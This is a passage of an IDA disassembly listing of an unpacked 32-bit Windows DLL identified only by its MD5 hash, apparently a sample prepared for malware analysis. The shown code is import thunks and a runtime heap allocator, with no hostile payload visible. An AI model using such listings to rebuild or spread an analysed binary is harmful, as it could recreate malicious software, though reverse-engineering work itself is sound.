;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
; Input MD5 : 5890F017CC8E8DDA71A7CD0DE7270BDF
; File Name : u:\work\5890f017cc8e8dda71a7cd0de7270bdf_unpacked.exe
; Format : Portable executable for 80386 (PE)
; Imagebase : 10000000
; Section 1. (virtual address 00001000)
; Virtual size : 00002C00 ( 11264.)
; Section size in file : 00002C00 ( 11264.)
; Offset to raw data for section: 00001000
; Flags E0000020: Text Executable Readable Writable
; Alignment : default
.686p
.mmx
.model flat
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
CODE segment para public 'CODE' use32
assume cs:CODE
;org 10001000h
assume es:nothing, ss:nothing, ds:CODE, fs:nothing, gs:nothing
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_10001000 proc near ; CODE XREF: sub_10002E44+39�p
; sub_10002E44+54�p
; DATA XREF: ...
jmp ds:dword_100060C0
sub_10001000 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_10001008 proc near ; CODE XREF: sub_10002840+14�p
; sub_1000285C+16�p ...
jmp ds:dword_100060BC
sub_10001008 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_10001010 proc near ; CODE XREF: sub_10002CB8-2B6�p
; CODE:10002C10�p
; DATA XREF: ...
jmp ds:dword_100060B8
sub_10001010 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_10001018 proc near ; CODE XREF: sub_10002CB8-31E�p
; sub_10002CB8-2E1�p ...
jmp ds:dword_100060B4
sub_10001018 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_10001020 proc near ; CODE XREF: sub_10002E44+3F�p
; sub_10002E44+5A�p
jmp ds:dword_100060B0
sub_10001020 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_10001028 proc near ; CODE XREF: sub_10002568+B�p
; sub_10002568+37�p ...
jmp ds:dword_100060D0
sub_10001028 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_10001030 proc near ; CODE XREF: sub_10002ED0+BA�p
jmp ds:dword_100060AC
sub_10001030 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_10001038 proc near ; CODE XREF: sub_10002E44+78�p
jmp ds:dword_100060CC
sub_10001038 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_10001040 proc near ; CODE XREF: sub_10002ED0+85�p
jmp ds:dword_100060A8
sub_10001040 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_10001048 proc near ; CODE XREF: sub_10002654:loc_1000268A�p
; sub_10003318+54�p
jmp ds:dword_100060A4
sub_10001048 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_10001050 proc near ; CODE XREF: sub_10002654+24�p
jmp ds:dword_100060A0
sub_10001050 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_10001058 proc near ; CODE XREF: sub_10001080+A�p
jmp ds:dword_1000609C
sub_10001058 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_10001060 proc near ; CODE XREF: sub_10002764+6B�p
jmp ds:dword_100060E0
sub_10001060 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_10001068 proc near ; CODE XREF: sub_10002764+22�p
jmp ds:dword_100060DC
sub_10001068 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_10001070 proc near ; CODE XREF: sub_10002764+55�p
jmp ds:dword_100060D8
sub_10001070 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_10001078 proc near ; CODE XREF: sub_10003318+68�p
jmp ds:dword_10006098
sub_10001078 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_10001080 proc near ; CODE XREF: sub_10003318+5E�p
var_1C = word ptr -1Ch
var_18 = word ptr -18h
push ebx
add esp, 0FFFFFFBCh
mov ebx, 0Ah
push esp
call sub_10001058 ; GetStartupInfoA
test byte ptr [esp+48h+var_1C], 1
jz short loc_1000109B
movzx ebx, [esp+48h+var_18]
loc_1000109B: ; CODE XREF: sub_10001080+14�j
mov eax, ebx
add esp, 44h
pop ebx
retn
sub_10001080 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_100010A4 proc near ; CODE XREF: sub_100010E4+13�p
; sub_10001770+53�p
jmp ds:dword_10006094
sub_100010A4 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_100010AC proc near ; CODE XREF: sub_10001834+3F�p
; sub_10001834+9D�p
jmp ds:dword_10006090
sub_100010AC endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_100010B4 proc near ; CODE XREF: sub_10001288+2F�p
; sub_100012EC+1E�p ...
jmp ds:dword_1000608C
sub_100010B4 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_100010BC proc near ; CODE XREF: sub_10001288+56�p
; sub_100012EC+69�p ...
jmp ds:dword_10006088
sub_100010BC endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_100010C4 proc near ; CODE XREF: sub_10001770+16�p
jmp ds:dword_10006084
sub_100010C4 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_100010CC proc near ; CODE XREF: sub_10001770+29�p
; sub_10001834+2D�p ...
jmp ds:dword_10006080
sub_100010CC endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_100010D4 proc near ; CODE XREF: sub_10001770+B0�p
; sub_10001834+C6�p ...
jmp ds:dword_1000607C
sub_100010D4 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_100010DC proc near ; CODE XREF: sub_10001834+D0�p
jmp ds:dword_10006078
sub_100010DC endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_100010E4 proc near ; CODE XREF: sub_1000113C+6�p
push ebx
push esi
mov esi, offset dword_100055CC
cmp dword ptr [esi], 0
jnz short loc_1000112A
push 644h
push 0
call sub_100010A4 ; LocalAlloc
mov ecx, eax
test ecx, ecx
jnz short loc_10001107
xor eax, eax
pop esi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_10001107: ; CODE XREF: sub_100010E4+1C�j
mov eax, ds:dword_100055C8
mov [ecx], eax
mov ds:dword_100055C8, ecx
xor edx, edx
loc_10001116: ; CODE XREF: sub_100010E4+44�j
mov eax, edx
add eax, eax
lea eax, [ecx+eax*8+4]
mov ebx, [esi]
mov [eax], ebx
mov [esi], eax
inc edx
cmp edx, 64h
jnz short loc_10001116
loc_1000112A: ; CODE XREF: sub_100010E4+A�j
mov eax, [esi]
mov edx, [eax]
mov [esi], edx
pop esi
pop ebx
retn
sub_100010E4 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_10001134 proc near ; CODE XREF: sub_10001770+33�p
; sub_10001770+3D�p ...
mov [eax], eax
mov [eax+4], eax
retn
sub_10001134 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_1000113C proc near ; CODE XREF: sub_10001184+5E�p
; sub_100011F8+6F�p ...
push ebx
push esi
mov esi, edx
mov ebx, eax
call sub_100010E4
test eax, eax
jnz short loc_10001150
xor eax, eax
pop esi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_10001150: ; CODE XREF: sub_1000113C+D�j
mov edx, [esi]
mov [eax+8], edx
mov edx, [esi+4]
mov [eax+0Ch], edx
mov edx, [ebx]
mov [eax], edx
mov [eax+4], ebx
mov [edx+4], eax
mov [ebx], eax
mov al, 1
pop esi
pop ebx
retn
sub_1000113C endp
; =============== S U B R O U T I N E =======================================
sub_1000116C proc near ; CODE XREF: sub_10001184+2C�p
; sub_10001184+49�p ...
mov edx, [eax+4]
mov ecx, [eax]
mov [edx], ecx
mov [ecx+4], edx
mov edx, ds:dword_100055CC
mov [eax], edx
mov ds:dword_100055CC, eax
retn
sub_1000116C endp
; =============== S U B R O U T I N E =======================================
sub_10001184 proc near ; CODE XREF: sub_10001530+6C�p
; sub_100015C0+62�p ...
var_14 = dword ptr -14h
push ebx
push esi
push edi
push ebp
push ecx
mov esi, ecx
mov [esp+14h+var_14], edx
mov ebp, eax
mov ebx, [ebp+0]
mov eax, [esp+14h+var_14]
mov edx, [eax]
mov [esi], edx
mov edx, [eax+4]
mov [esi+4], edx
loc_100011A0: ; CODE XREF: sub_10001184+58�j
mov edi, [ebx]
mov eax, [ebx+8]
mov edx, eax
add edx, [ebx+0Ch]
cmp edx, [esi]
jnz short loc_100011C2
mov eax, ebx
call sub_1000116C
mov eax, [ebx+8]
mov [esi], eax
mov eax, [ebx+0Ch]
add [esi+4], eax
jmp short loc_100011D8
; ---------------------------------------------------------------------------
loc_100011C2: ; CODE XREF: sub_10001184+28�j
mov edx, [esi]
add edx, [esi+4]
cmp eax, edx
jnz short loc_100011D8
mov eax, ebx
call sub_1000116C
mov eax, [ebx+0Ch]
add [esi+4], eax
loc_100011D8: ; CODE XREF: sub_10001184+3C�j
; sub_10001184+45�j
mov ebx, edi
cmp ebp, ebx
jnz short loc_100011A0
mov edx, esi
mov eax, ebp
call sub_1000113C
test al, al
jnz short loc_100011EF
xor eax, eax
mov [esi], eax
loc_100011EF: ; CODE XREF: sub_10001184+65�j
pop edx
pop ebp
pop edi
pop esi
pop ebx
retn
sub_10001184 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_100011F8 proc near ; CODE XREF: sub_100016E4+7A�p
; sub_10001ACC+99�p
var_18 = dword ptr -18h
var_14 = dword ptr -14h
push ebx
push esi
push edi
push ebp
add esp, 0FFFFFFF8h
mov ebx, eax
mov edi, ebx
loc_10001203: ; CODE XREF: sub_100011F8+84�j
mov esi, [edx]
mov eax, [ebx+8]
cmp esi, eax
jb short loc_10001278
mov ecx, esi
add ecx, [edx+4]
mov ebp, eax
add ebp, [ebx+0Ch]
cmp ecx, ebp
ja short loc_10001278
cmp esi, eax
jnz short loc_10001239
mov eax, [edx+4]
add [ebx+8], eax
mov eax, [edx+4]
sub [ebx+0Ch], eax
cmp dword ptr [ebx+0Ch], 0
jnz short loc_10001274
mov eax, ebx
call sub_1000116C
jmp short loc_10001274
; ---------------------------------------------------------------------------
loc_10001239: ; CODE XREF: sub_100011F8+24�j
mov ecx, [edx]
mov esi, [edx+4]
add ecx, esi
mov edi, eax
add edi, [ebx+0Ch]
cmp ecx, edi
jnz short loc_1000124E
sub [ebx+0Ch], esi
jmp short loc_10001274
; ---------------------------------------------------------------------------
loc_1000124E: ; CODE XREF: sub_100011F8+4F�j
mov ecx, [edx]
add ecx, [edx+4]
mov [esp+18h+var_18], ecx
sub edi, ecx
mov [esp+18h+var_14], edi
mov edx, [edx]
sub edx, eax
mov [ebx+0Ch], edx
mov edx, esp
mov eax, ebx
call sub_1000113C
test al, al
jnz short loc_10001274
xor eax, eax
jmp short loc_10001280
; ---------------------------------------------------------------------------
loc_10001274: ; CODE XREF: sub_100011F8+36�j
; sub_100011F8+3F�j ...
mov al, 1
jmp short loc_10001280
; ---------------------------------------------------------------------------
loc_10001278: ; CODE XREF: sub_100011F8+12�j
; sub_100011F8+20�j
mov ebx, [ebx]
cmp edi, ebx
jnz short loc_10001203
xor eax, eax
loc_10001280: ; CODE XREF: sub_100011F8+7A�j
; sub_100011F8+7E�j
pop ecx
pop edx
pop ebp
pop edi
pop esi
pop ebx
retn
sub_100011F8 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_10001288 proc near ; CODE XREF: sub_10001530+5C�p
push ebx
push esi
push edi
mov ebx, edx
mov esi, eax
cmp esi, 100000h
jge short loc_1000129E
mov esi, 100000h
jmp short loc_100012AA
; ---------------------------------------------------------------------------
loc_1000129E: ; CODE XREF: sub_10001288+D�j
add esi, 0FFFFh
and esi, 0FFFF0000h
loc_100012AA: ; CODE XREF: sub_10001288+14�j
mov [ebx+4], esi
push 1
push 2000h
push esi
push 0
call sub_100010B4 ; VirtualAlloc
mov edi, eax
mov [ebx], edi
test edi, edi
jz short loc_100012E7
mov edx, ebx
mov eax, offset off_100055D0
call sub_1000113C
test al, al
jnz short loc_100012E7
push 8000h
push 0
mov eax, [ebx]
push eax
call sub_100010BC ; VirtualFree
xor eax, eax
mov [ebx], eax
loc_100012E7: ; CODE XREF: sub_10001288+3A�j
; sub_10001288+4A�j
pop edi
pop esi
pop ebx
retn
sub_10001288 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_100012EC proc near ; CODE XREF: sub_100015C0+4C�p
; sub_100015C0+93�p
push ebx
push esi
push edi
push ebp
mov ebx, ecx
mov esi, edx
mov ebp, eax
mov dword ptr [ebx+4], 100000h
push 4
push 2000h
push 100000h
push ebp
call sub_100010B4 ; VirtualAlloc
mov edi, eax
mov [ebx], edi
test edi, edi
jnz short loc_10001336
add esi, 0FFFFh
and esi, 0FFFF0000h
mov [ebx+4], esi
push 4
push 2000h
push esi
push ebp
call sub_100010B4 ; VirtualAlloc
mov [ebx], eax
loc_10001336: ; CODE XREF: sub_100012EC+29�j
cmp dword ptr [ebx], 0
jz short loc_1000135E
mov edx, ebx
mov eax, offset off_100055D0
call sub_1000113C
test al, al
jnz short loc_1000135E
push 8000h
push 0
mov eax, [ebx]
push eax
call sub_100010BC ; VirtualFree
xor eax, eax
mov [ebx], eax
loc_1000135E: ; CODE XREF: sub_100012EC+4D�j
; sub_100012EC+5D�j
pop ebp
pop edi
pop esi
pop ebx
retn
sub_100012EC endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_10001364 proc near ; CODE XREF: sub_10001530+7E�p
; sub_100015C0+7A�p ...
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
push ebx
push esi
push edi
push ebp
add esp, 0FFFFFFECh
mov [esp+24h+var_20], ecx
mov [esp+24h+var_24], edx
mov [esp+24h+var_1C], 0FFFFFFFFh
xor edx, edx
mov [esp+24h+var_18], edx
mov ebp, eax
mov eax, [esp+24h+var_24]
add eax, ebp
mov [esp+24h+var_14], eax
mov ebx, ds:off_100055D0
jmp short loc_100013E4
; ---------------------------------------------------------------------------
loc_10001393: ; CODE XREF: sub_10001364+86�j
mov edi, [ebx]
mov esi, [ebx+8]
cmp ebp, esi
ja short loc_100013E2
mov eax, esi
add eax, [ebx+0Ch]
cmp eax, [esp+24h+var_14]
ja short loc_100013E2
cmp esi, [esp+24h+var_1C]
jnb short loc_100013B1
mov [esp+24h+var_1C], esi
loc_100013B1: ; CODE XREF: sub_10001364+47�j
mov eax, esi
add eax, [ebx+0Ch]
cmp eax, [esp+24h+var_18]
jbe short loc_100013C0
mov [esp+24h+var_18], eax
loc_100013C0: ; CODE XREF: sub_10001364+56�j
push 8000h
push 0
push esi
call sub_100010BC ; VirtualFree
test eax, eax
jnz short loc_100013DB
mov ds:dword_100055AC, 1
loc_100013DB: ; CODE XREF: sub_10001364+6B�j
mov eax, ebx
call sub_1000116C
loc_100013E2: ; CODE XREF: sub_10001364+36�j
; sub_10001364+41�j
mov ebx, edi
loc_100013E4: ; CODE XREF: sub_10001364+2D�j
cmp ebx, offset off_100055D0
jnz short loc_10001393
mov eax, [esp+24h+var_20]
xor edx, edx
mov [eax], edx
cmp [esp+24h+var_18], 0
jz short loc_10001414
mov eax, [esp+24h+var_20]
mov edx, [esp+24h+var_1C]
mov [eax], edx
mov eax, [esp+24h+var_18]
sub eax, [esp+24h+var_1C]
mov edx, [esp+24h+var_20]
mov [edx+4], eax
loc_10001414: ; CODE XREF: sub_10001364+95�j
add esp, 14h
pop ebp
pop edi
pop esi
pop ebx
retn
sub_10001364 endp
; =============== S U B R O U T I N E =======================================
sub_1000141C proc near ; CODE XREF: sub_10001530+2D�p
; sub_100015C0+E6�p
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
push ebx
push esi
push edi
push ebp
add esp, 0FFFFFFF4h
mov [esp+1Ch+var_18], ecx
mov [esp+1Ch+var_1C], edx
mov edx, eax
mov ebp, edx
and ebp, 0FFFFF000h
add edx, [esp+1Ch+var_1C]
add edx, 0FFFh
and edx, 0FFFFF000h
mov [esp+1Ch+var_14], edx
mov eax, [esp+1Ch+var_18]
mov [eax], ebp
mov eax, [esp+1Ch+var_14]
sub eax, ebp
mov edx, [esp+1Ch+var_18]
mov [edx+4], eax
mov esi, ds:off_100055D0
jmp short loc_1000149E
; ---------------------------------------------------------------------------
loc_10001462: ; CODE XREF: sub_1000141C+88�j
mov ebx, [esi+8]
mov edi, [esi+0Ch]
add edi, ebx
cmp ebp, ebx
jbe short loc_10001470
mov ebx, ebp
loc_10001470: ; CODE XREF: sub_1000141C+50�j
cmp edi, [esp+1Ch+var_14]
jbe short loc_1000147A
mov edi, [esp+1Ch+var_14]
loc_1000147A: ; CODE XREF: sub_1000141C+58�j
cmp edi, ebx
jbe short loc_1000149C
push 4
push 1000h
sub edi, ebx
push edi
push ebx
call sub_100010B4 ; VirtualAlloc
test eax, eax
jnz short loc_1000149C
mov eax, [esp+1Ch+var_18]
xor edx, edx
mov [eax], edx
jmp short loc_100014A6
; ---------------------------------------------------------------------------
loc_1000149C: ; CODE XREF: sub_1000141C+60�j
; sub_1000141C+74�j
mov esi, [esi]
loc_1000149E: ; CODE XREF: sub_1000141C+44�j
cmp esi, offset off_100055D0
jnz short loc_10001462
loc_100014A6: ; CODE XREF: sub_1000141C+7E�j
add esp, 0Ch
pop ebp
pop edi
pop esi
pop ebx
retn
sub_1000141C endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_100014B0 proc near ; CODE XREF: sub_100016E4+2E�p
var_14 = dword ptr -14h
push ebx
push esi
push edi
push ebp
push ecx
mov ebx, eax
mov esi, ebx
add esi, 0FFFh
and esi, 0FFFFF000h
mov [esp+14h+var_14], esi
mov ebp, ebx
add ebp, edx
and ebp, 0FFFFF000h
mov eax, [esp+14h+var_14]
mov [ecx], eax
mov eax, ebp
sub eax, [esp+14h+var_14]
mov [ecx+4], eax
mov esi, ds:off_100055D0
jmp short loc_1000151F
; ---------------------------------------------------------------------------
loc_100014E7: ; CODE XREF: sub_100014B0+75�j
mov ebx, [esi+8]
mov edi, [esi+0Ch]
add edi, ebx
cmp ebx, [esp+14h+var_14]
jnb short loc_100014F7
mov ebx, [esp+14h+var_14]
loc_100014F7: ; CODE XREF: sub_100014B0+42�j
cmp ebp, edi
jnb short loc_100014FD
mov edi, ebp
loc_100014FD: ; CODE XREF: sub_100014B0+49�j
cmp edi, ebx
jbe short loc_1000151D
push 4000h
sub edi, ebx
push edi
push ebx
call sub_100010BC ; VirtualFree
test eax, eax
jnz short loc_1000151D
mov ds:dword_100055AC, 2
loc_1000151D: ; CODE XREF: sub_100014B0+4F�j
; sub_100014B0+61�j
mov esi, [esi]
loc_1000151F: ; CODE XREF: sub_100014B0+35�j
cmp esi, offset off_100055D0
jnz short loc_100014E7
pop edx
pop ebp
pop edi
pop esi
pop ebx
retn
sub_100014B0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_10001530 proc near ; CODE XREF: sub_10001CDC+B�p
var_18 = dword ptr -18h
push ebx
push esi
push edi
push ebp
add esp, 0FFFFFFF8h
mov esi, edx
mov edi, eax
mov ebp, offset off_100055E0
add edi, 3FFFh
and edi, 0FFFFC000h
loc_1000154C: ; CODE XREF: sub_10001530+75�j
mov ebx, [ebp+0]
jmp short loc_10001584
; ---------------------------------------------------------------------------
loc_10001551: ; CODE XREF: sub_10001530+56�j
cmp edi, [ebx+0Ch]
jg short loc_10001582
mov ecx, esi
mov edx, edi
mov eax, [ebx+8]
call sub_1000141C
cmp dword ptr [esi], 0
jz short loc_100015B7
mov eax, [esi+4]
add [ebx+8], eax
mov eax, [esi+4]
sub [ebx+0Ch], eax
cmp dword ptr [ebx+0Ch], 0
jnz short loc_100015B7
mov eax, ebx
call sub_1000116C
jmp short loc_100015B7
; ---------------------------------------------------------------------------
loc_10001582: ; CODE XREF: sub_10001530+24�j
mov ebx, [ebx]
loc_10001584: ; CODE XREF: sub_10001530+1F�j
cmp ebx, ebp
jnz short loc_10001551
mov edx, esi
mov eax, edi
call sub_10001288
cmp dword ptr [esi], 0
jz short loc_100015B7
mov ecx, esp
mov edx, esi
mov eax, ebp
call sub_10001184
cmp [esp+18h+var_18], 0
jnz short loc_1000154C
mov ecx, esp
mov edx, [esi+4]
mov eax, [esi]
call sub_10001364
xor eax, eax
mov [esi], eax
loc_100015B7: ; CODE XREF: sub_10001530+35�j
; sub_10001530+47�j ...
pop ecx
pop edx
pop ebp
pop edi
pop esi
pop ebx
retn
sub_10001530 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_100015C0 proc near ; CODE XREF: sub_10001D08+10�p
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
push ebx
push esi
push edi
push ebp
add esp, 0FFFFFFECh
mov [esp+24h+var_24], ecx
mov edi, edx
mov esi, eax
mov ebp, offset off_100055E0
add edi, 3FFFh
and edi, 0FFFFC000h
loc_100015DF: ; CODE XREF: sub_100015C0+6C�j
; sub_100015C0+B3�j
mov ebx, [ebp+0]
jmp short loc_100015E6
; ---------------------------------------------------------------------------
loc_100015E4: ; CODE XREF: sub_100015C0+2D�j
mov ebx, [ebx]
loc_100015E6: ; CODE XREF: sub_100015C0+22�j
cmp ebx, ebp
jz short loc_100015EF
cmp esi, [ebx+8]
jnz short loc_100015E4
loc_100015EF: ; CODE XREF: sub_100015C0+28�j
cmp esi, [ebx+8]
jnz short loc_1000164B
cmp edi, [ebx+0Ch]
jle loc_10001693
lea ecx, [esp+24h+var_20]
mov edx, edi
sub edx, [ebx+0Ch]
mov eax, [ebx+8]
add eax, [ebx+0Ch]
call sub_100012EC
cmp [esp+24h+var_20], 0
jz short loc_1000164B
lea ecx, [esp+24h+var_18]
lea edx, [esp+24h+var_20]
mov eax, ebp
call sub_10001184
cmp [esp+24h+var_18], 0
jnz short loc_100015DF
lea ecx, [esp+24h+var_18]
mov edx, [esp+24h+var_1C]
mov eax, [esp+24h+var_20]
call sub_10001364
mov eax, [esp+24h+var_24]
xor edx, edx
mov [eax], edx
jmp loc_100016DB
; ---------------------------------------------------------------------------
loc_1000164B: ; CODE XREF: sub_100015C0+32�j
; sub_100015C0+56�j
lea ecx, [esp+24h+var_20]
mov edx, edi
mov eax, esi
call sub_100012EC
cmp [esp+24h+var_20], 0
jz short loc_10001693
lea ecx, [esp+24h+var_18]
lea edx, [esp+24h+var_20]
mov eax, ebp
call sub_10001184
cmp [esp+24h+var_18], 0
jnz loc_100015DF
lea ecx, [esp+24h+var_18]
mov edx, [esp+24h+var_1C]
mov eax, [esp+24h+var_20]
call sub_10001364
mov eax, [esp+24h+var_24]
xor edx, edx
mov [eax], edx
jmp short loc_100016DB
; ---------------------------------------------------------------------------
loc_10001693: ; CODE XREF: sub_100015C0+37�j
; sub_100015C0+9D�j
mov ebp, [ebx+8]
cmp esi, ebp
jnz short loc_100016D4
cmp edi, [ebx+0Ch]
jg short loc_100016D4
mov ecx, [esp+24h+var_24]
mov edx, edi
mov eax, ebp
call sub_1000141C
mov eax, [esp+24h+var_24]
cmp dword ptr [eax], 0
jz short loc_100016DB
mov eax, [esp+24h+var_24]
mov eax, [eax+4]
add [ebx+8], eax
mov eax, [esp+24h+var_24]
mov eax, [eax+4]
sub [ebx+0Ch], eax
cmp dword ptr [ebx+0Ch], 0
jnz short loc_100016DB
mov eax, ebx
call sub_1000116C
jmp short loc_100016DB
; ---------------------------------------------------------------------------
loc_100016D4: ; CODE XREF: sub_100015C0+D8�j
; sub_100015C0+DD�j
mov eax, [esp+24h+var_24]
xor edx, edx
mov [eax], edx
loc_100016DB: ; CODE XREF: sub_100015C0+86�j
; sub_100015C0+D1�j ...
add esp, 14h
pop ebp
pop edi
pop esi
pop ebx
retn
sub_100015C0 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_100016E4 proc near ; CODE XREF: sub_10001ACC+4E�p
; sub_10001ACC+61�p
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
push ebx
push esi
push edi
add esp, 0FFFFFFECh
mov edi, ecx
mov [esp+20h+var_20], edx
lea ebx, [eax+3FFFh]
and ebx, 0FFFFC000h
mov esi, [esp+20h+var_20]
add esi, eax
and esi, 0FFFFC000h
cmp ebx, esi
jnb short loc_10001765
mov ecx, edi
mov edx, esi
sub edx, ebx
mov eax, ebx
call sub_100014B0
lea ecx, [esp+20h+var_1C]
mov edx, edi
mov eax, offset off_100055E0
call sub_10001184
mov ebx, [esp+20h+var_1C]
test ebx, ebx
jz short loc_1000174E
lea ecx, [esp+20h+var_14]
mov edx, [esp+20h+var_18]
mov eax, ebx
call sub_10001364
mov eax, [esp+20h+var_14]
mov [esp+20h+var_1C], eax
mov eax, [esp+20h+var_10]
mov [esp+20h+var_18], eax
loc_1000174E: ; CODE XREF: sub_100016E4+49�j
cmp [esp+20h+var_1C], 0
jz short loc_10001769
lea edx, [esp+20h+var_1C]
mov eax, offset off_100055E0
call sub_100011F8
jmp short loc_10001769
; ---------------------------------------------------------------------------
loc_10001765: ; CODE XREF: sub_100016E4+24�j
xor eax, eax
mov [edi], eax
loc_10001769: ; CODE XREF: sub_100016E4+6F�j
; sub_100016E4+7F�j
add esp, 14h
pop edi
pop esi
pop ebx
retn
sub_100016E4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_10001770 proc near ; CODE XREF: sub_10001E5C+14�p
; sub_10001FEC+19�p ...
arg_0 = dword ptr 8
; FUNCTION CHUNK AT 10002A5C SIZE 00000036 BYTES
push ebp
mov ebp, esp
xor edx, edx
push ebp
push offset loc_10001826
push dword ptr fs:[edx]
mov fs:[edx], esp
push offset dword_100055B0
call sub_100010C4 ; InitializeCriticalSection
cmp ds:byte_10005035, 0
jz short loc_1000179E
push offset dword_100055B0
call sub_100010CC ; RtlEnterCriticalSection
loc_1000179E: ; CODE XREF: sub_10001770+22�j
mov eax, offset off_100055D0
call sub_10001134
mov eax, offset off_100055E0
call sub_10001134
mov eax, offset off_1000560C
call sub_10001134
push 0FF8h
push 0
call sub_100010A4 ; LocalAlloc
mov ds:dword_10005608, eax
cmp ds:dword_10005608, 0
jz short loc_10001805
mov eax, 3
loc_100017DB: ; CODE XREF: sub_10001770+7D�j
mov edx, ds:dword_10005608
xor ecx, ecx
mov [edx+eax*4-0Ch], ecx
inc eax
cmp eax, 401h
jnz short loc_100017DB
mov eax, offset dword_100055F0
mov [eax+4], eax
mov [eax], eax
mov ds:dword_100055FC, eax
mov ds:byte_100055A8, 1
loc_10001805: ; CODE XREF: sub_10001770+64�j
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_1000182D
loc_10001812: ; CODE XREF: sub_10001770+BB�j
cmp ds:byte_10005035, 0
jz short locret_10001825
push offset dword_100055B0
call sub_100010D4 ; RtlLeaveCriticalSection
locret_10001825: ; CODE XREF: sub_10001770+A9�j
retn
; ---------------------------------------------------------------------------
loc_10001826: ; DATA XREF: sub_10001770+6�o
jmp loc_10002A5C
; ---------------------------------------------------------------------------
jmp short loc_10001812
; ---------------------------------------------------------------------------
loc_1000182D: ; DATA XREF: sub_10001770+9D�o
mov al, ds:byte_100055A8
pop ebp
retn
sub_10001770 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_10001834 proc near ; CODE XREF: sub_100032C4+37�p
push ebp
mov ebp, esp
push ebx
cmp ds:byte_100055A8, 0
jz loc_10001911
xor edx, edx
push ebp
push offset loc_1000190A
push dword ptr fs:[edx]
mov fs:[edx], esp
cmp ds:byte_10005035, 0
jz short loc_10001866
push offset dword_100055B0
call sub_100010CC ; RtlEnterCriticalSection
loc_10001866: ; CODE XREF: sub_10001834+26�j
mov ds:byte_100055A8, 0
mov eax, ds:dword_10005608
push eax
call sub_100010AC ; LocalFree
xor eax, eax
mov ds:dword_10005608, eax
mov ebx, ds:off_100055D0
jmp short loc_10001899
; ---------------------------------------------------------------------------
